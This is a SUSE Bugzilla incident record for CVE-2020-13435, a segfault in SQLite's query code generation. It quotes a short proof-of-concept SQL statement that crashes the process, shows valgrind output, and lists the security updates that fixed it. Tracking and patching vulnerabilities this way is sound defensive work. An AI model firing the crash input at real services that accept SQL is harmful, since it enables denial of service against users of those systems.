Bug 1172091 - (CVE-2020-13435) VUL-0: CVE-2020-13435: sqlite3: Segfault in sqlite3ExprCodeTarget
(CVE-2020-13435)
VUL-0: CVE-2020-13435: sqlite3: Segfault in sqlite3ExprCodeTarget
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Major
: unspecified
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/260079/
CVSSv3.1:SUSE:CVE-2020-13435:7.1:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2020-05-26 09:13 UTC by Andreas Stieger
Modified: 2022-06-10 10:37 UTC (History)
7 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Andreas Stieger 2020-05-26 09:13:31 UTC
Segfault in sqlite3ExprCodeTarget 

From https://www.sqlite.org/releaselog/3_32_1.html

> Fix two long-standing bugs that allow malicious SQL statements to crash the process that is running SQLite. 

From https://www.sqlite.org/src/info/7a5279a25c57adf1

> POC:
> ---
> CREATE TABLE a(c UNIQUE);
> SELECT a.c FROM a JOIN a b ON 3 = a.c NATURAL JOIN a WHERE a.c IN((SELECT(SELECT coalesce(lead(2) OVER(), 
> SUM(c))) FROM a d WHERE a.c));

This might be minor due to the fact that most applications using sqlite will not allow the full SQL statement to be supplied by the user.
Comment 1 OBSbugzilla Bot 2020-05-26 10:00:07 UTC
This is an autogenerated message for OBS integration:
This bug (1172091) was mentioned in
https://build.opensuse.org/request/show/808973 Factory / sqlite3
Comment 2 Alexandros Toptsoglou 2020-05-26 14:30:53 UTC
Tracked SLE15 as affected. To reproduce the issue simply run: 

CREATE TABLE a(c UNIQUE);
SELECT a.c FROM a JOIN a b ON 3 = a.c NATURAL JOIN a WHERE a.c IN((SELECT(SELECT coalesce(lead(2) OVER(), SUM(c))) FROM a d WHERE a.c));

this will produce a segmentation fault. 

OUTPUT from LEAP 15.1: 

==25350== Invalid read of size 8
==25350==    at 0x4EBF813: sqlite3ColumnsFromExprList.isra.784 (sqlite3.c:126599)
==25350==    by 0x4EBF8B7: sqlite3ExpandSubquery (sqlite3.c:129418)
==25350==    by 0x4EBFDFE: sqlite3WindowRewrite (sqlite3.c:146388)
==25350==    by 0x4EBFDFE: sqlite3Select (sqlite3.c:130283)
==25350==    by 0x4EC3054: sqlite3CodeSubselect (sqlite3.c:99820)
==25350==    by 0x4EC5E72: sqlite3ExprCodeTarget (sqlite3.c:100770)
==25350==    by 0x4EC72A3: sqlite3ExprCodeExprList (sqlite3.c:101202)
==25350==    by 0x4EC805C: innerLoopLoadRow (sqlite3.c:125174)
==25350==    by 0x4EC805C: selectInnerLoop (sqlite3.c:125626)
==25350==    by 0x4EC1F9A: sqlite3Select (sqlite3.c:131198)
==25350==    by 0x4EC3054: sqlite3CodeSubselect (sqlite3.c:99820)
==25350==    by 0x4EC5E72: sqlite3ExprCodeTarget (sqlite3.c:100770)
==25350==    by 0x4ECB588: codeEqualityTerm (sqlite3.c:136650)
==25350==    by 0x4ECC95B: codeAllEqualityTerms (sqlite3.c:136871)
==25350==    by 0x4ECC95B: sqlite3WhereCodeOneLoopStart (sqlite3.c:137778)
==25350==    by 0x4ECC95B: sqlite3WhereBegin (sqlite3.c:145131)
==25350==  Address 0x8 is not stack'd, malloc'd or (recently) free'd
Comment 10 Swamp Workflow Management 2021-07-14 20:03:17 UTC
SUSE-SU-2021:2320-1: An update that fixes 21 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1157818,1158812,1158958,1158959,1158960,1159491,1159715,1159847,1159850,1160309,1160438,1160439,1164719,1172091,1172115,1172234,1172236,1172240,1173641,928700,928701
CVE References: CVE-2015-3414,CVE-2015-3415,CVE-2019-19244,CVE-2019-19317,CVE-2019-19603,CVE-2019-19645,CVE-2019-19646,CVE-2019-19880,CVE-2019-19923,CVE-2019-19924,CVE-2019-19925,CVE-2019-19926,CVE-2019-19959,CVE-2019-20218,CVE-2020-13434,CVE-2020-13435,CVE-2020-13630,CVE-2020-13631,CVE-2020-13632,CVE-2020-15358,CVE-2020-9327
JIRA References: SLE-16032
Sources used:
SUSE MicroOS 5.0 (src):    sqlite3-3.36.0-3.12.1
SUSE Manager Server 4.0 (src):    sqlite3-3.36.0-3.12.1
SUSE Manager Retail Branch Server 4.0 (src):    sqlite3-3.36.0-3.12.1
SUSE Manager Proxy 4.0 (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Server for SAP 15 (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Server 15-LTSS (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    sqlite3-3.36.0-3.12.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    sqlite3-3.36.0-3.12.1
SUSE Enterprise Storage 6 (src):    sqlite3-3.36.0-3.12.1
SUSE CaaS Platform 4.0 (src):    sqlite3-3.36.0-3.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 11 Swamp Workflow Management 2021-07-14 20:08:12 UTC
openSUSE-SU-2021:2320-1: An update that fixes 21 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1157818,1158812,1158958,1158959,1158960,1159491,1159715,1159847,1159850,1160309,1160438,1160439,1164719,1172091,1172115,1172234,1172236,1172240,1173641,928700,928701
CVE References: CVE-2015-3414,CVE-2015-3415,CVE-2019-19244,CVE-2019-19317,CVE-2019-19603,CVE-2019-19645,CVE-2019-19646,CVE-2019-19880,CVE-2019-19923,CVE-2019-19924,CVE-2019-19925,CVE-2019-19926,CVE-2019-19959,CVE-2019-20218,CVE-2020-13434,CVE-2020-13435,CVE-2020-13630,CVE-2020-13631,CVE-2020-13632,CVE-2020-15358,CVE-2020-9327
JIRA References: SLE-16032
Sources used:
openSUSE Leap 15.3 (src):    sqlite3-3.36.0-3.12.1
Comment 12 Swamp Workflow Management 2021-07-20 01:28:15 UTC
openSUSE-SU-2021:1058-1: An update that fixes 21 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1157818,1158812,1158958,1158959,1158960,1159491,1159715,1159847,1159850,1160309,1160438,1160439,1164719,1172091,1172115,1172234,1172236,1172240,1173641,928700,928701
CVE References: CVE-2015-3414,CVE-2015-3415,CVE-2019-19244,CVE-2019-19317,CVE-2019-19603,CVE-2019-19645,CVE-2019-19646,CVE-2019-19880,CVE-2019-19923,CVE-2019-19924,CVE-2019-19925,CVE-2019-19926,CVE-2019-19959,CVE-2019-20218,CVE-2020-13434,CVE-2020-13435,CVE-2020-13630,CVE-2020-13631,CVE-2020-13632,CVE-2020-15358,CVE-2020-9327
JIRA References: SLE-16032
Sources used:
openSUSE Leap 15.2 (src):    sqlite3-3.36.0-lp152.4.3.1
Comment 14 Swamp Workflow Management 2021-09-23 20:36:26 UTC
SUSE-SU-2021:3215-1: An update that fixes 28 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1157818,1158812,1158958,1158959,1158960,1159491,1159715,1159847,1159850,1160309,1160438,1160439,1164719,1172091,1172115,1172234,1172236,1172240,1173641,928700,928701
CVE References: CVE-2015-3414,CVE-2015-3415,CVE-2016-6153,CVE-2017-10989,CVE-2017-2518,CVE-2018-20346,CVE-2018-8740,CVE-2019-16168,CVE-2019-19244,CVE-2019-19317,CVE-2019-19603,CVE-2019-19645,CVE-2019-19646,CVE-2019-19880,CVE-2019-19923,CVE-2019-19924,CVE-2019-19925,CVE-2019-19926,CVE-2019-19959,CVE-2019-20218,CVE-2019-8457,CVE-2020-13434,CVE-2020-13435,CVE-2020-13630,CVE-2020-13631,CVE-2020-13632,CVE-2020-15358,CVE-2020-9327
JIRA References: SLE-16032
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    sqlite3-3.36.0-9.18.1
SUSE OpenStack Cloud Crowbar 8 (src):    sqlite3-3.36.0-9.18.1
SUSE OpenStack Cloud 9 (src):    sqlite3-3.36.0-9.18.1
SUSE OpenStack Cloud 8 (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server 12-SP5 (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    sqlite3-3.36.0-9.18.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    sqlite3-3.36.0-9.18.1
HPE Helion Openstack 8 (src):    sqlite3-3.36.0-9.18.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Carlos López 2022-06-10 10:37:17 UTC
Done, closing.